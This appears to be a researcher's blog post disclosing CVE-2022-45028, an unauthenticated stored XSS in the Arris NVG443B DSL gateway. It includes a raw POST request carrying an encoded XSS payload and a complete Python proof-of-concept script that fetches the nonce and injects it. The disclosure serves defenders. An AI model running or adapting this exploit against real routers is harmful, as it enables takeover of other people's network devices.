Friday, November 4, 2022

[CVE-2022-45028] Unauthenticated Stored XSS in the Arris NVG443B

Update: I reported this vulnerability to MITRE on November 4th, 2022. It has been assigned CVE-2022-45028 with a CVSS score of 6.1 (Medium).


The Arris NVG443B DSL Gateway (distributed by Frontier Communications) running firmware version 9.3.0h3d36 is affected by a pre-authenticated stored Cross-site Scripting (XSS) vulnerability in the configuration web interface. The vulnerability likely affects other firmware versions and Arris products, but I have only confirmed the existence of the issue in the NVG443B.

I first discovered the vulnerability on July 20, 2022, and an Arris/CommScope employee confirmed (via email) that they fixed the vulnerability sometime between then and October 18, 2022:

The CommScope Engineering team confirmed the existence of the vulnerability and the patch has been released.

Unfortunately the employee didn't clarify what firmware version contains the fix.

At the time of discovery, Shodan indicated that several thousand of these devices were exposed to the internet and running the vulnerable firmware version.


Exploitation

The username field of a POST request can be used to deliver an XSS payload. An attacker can send an HTTP request such as the following to /cgi-bin/login.ha:

POST /cgi-bin/login.ha HTTP/1.1
Host: 192.168.254.254
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
 
nonce=8b277da8000e57ef989565d34d8479ce3fcb33edee9e25ad&username=%22%2f%3e%0a%3c%69%6d%67%20%73%72%63%3d%65%72%72%20%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%31%29%22%2f%3e%3c%62%72&password=1111111111&Continue=Continue

The next time a user navigates to /cgi-bin/logs.ha, the XSS will be triggered:

This vulnerability can be leveraged to perform actions such as changing the account password for the web interface administrator.


Proof of Concept

The following Python script is a PoC demonstrating the XSS. Simply run this script on the same LAN as an Arris NVG443B with the 9.3.0h3d36 firmware, and then navigate to http://192.168.254.254/cgi-bin/logs.ha to trigger the XSS (a benign alert dialog).

#!/usr/bin/env python3
# Author: Sean Pesce

# Required Python 3 libraries:
#     requests

import requests
import socket
import sys
import urllib3
from urllib.parse import quote

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

NVG443B_DEFAULT_IP = '192.168.254.254'


def get_nonce(host):
    url = f'http://{host}/cgi-bin/login.ha'
    canary = b'nonce" value="'
    response = requests.get(url, verify=False)
    data = response.content
    nonce_pos = data.index(canary) + len(canary)
    data = data[nonce_pos:]
    data = data.split(b'"')[0]
    data = data.decode('ascii')
    return data


def do_xss(host, nonce):
    url = f'http://{host}/cgi-bin/login.ha'
    body = f'nonce={nonce}&username=%22%2f%3e%0a%3c%69%6d%67%20%73%72%63%3d%65%72%72%20%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%27%53%65%61%6e%50%20%7c%20%58%53%53%27%29%22%2f%3e%3c%62%72&password=1111111111&Continue=Continue'
    response = requests.post(url, verify=False, data=body)
    return response


if __name__ == '__main__':
    if '-h' in sys.argv or '--help' in sys.argv:
        print(f'Usage:\n\tpython3 {sys.argv[0]} [host]\n\nhost: The hostname or IP address of an Arris NVG443B. If none is provided, the default value is {NVG443B_DEFAULT_IP}')
        sys.exit()
    
    HOST = NVG443B_DEFAULT_IP
    if len(sys.argv) > 1:
        HOST = sys.argv[1]
    
    NONCE = get_nonce(HOST)
    print(f'nonce={NONCE}')
    response = do_xss(HOST, NONCE)
    print(response)
    print(f'\nDone. Navigate to http://{HOST}/cgi-bin/logs.ha to trigger the XSS.')



No comments:

Post a Comment